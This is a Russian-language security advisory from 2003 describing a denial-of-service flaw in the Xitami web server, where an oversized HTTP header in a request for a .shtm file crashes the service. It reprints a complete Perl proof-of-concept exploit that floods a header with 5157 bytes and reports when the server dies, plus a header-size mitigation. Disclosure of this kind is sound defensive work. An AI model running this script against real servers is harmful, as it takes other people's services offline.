| Дата публикации: | 23.09.2003 |
| Всего просмотров: | 1621 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: - Xitami 2.5B4 (bw3225b4.exe),
Xitami 2.4D9 (bw3224d9.exe).
Описание: Уязвимость обнаружена в Xitami Web сервере. Удаленный атакующий может аварийно завершить работу Web сервера. Удаленный атакующий может послать http get запрос к .shtm файлу с http заголовком размером более 5154 байт, за которым следует “:”, чтобы аварийно завершить работу Xitami с ошибкой Microsoft Visual C++ Runtime Error в XIWIN32.EXE.
#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT
#
# Sending a GET request for a *.shtm file with a header field of >= 5154
bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de
use IO::Socket;
$ip="127.0.0.1";
$port=80;
$var="A" x 5157;
$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip,
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
print $mySocket "GET /test.shtm HTTP/1.0\r\n".
$var.": */*\r\n\r\n";
@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;
Возможно версии под другие платформы, отличные от Windows, также уязвимы.
URL производителя: http://www.ximati.com Решение:Ограничьте максимальные размеры HTTP заголовков в HTTP прокси. |
|
| Ссылки: | Denial of service vulnerability in Xitami Open Source Web Server |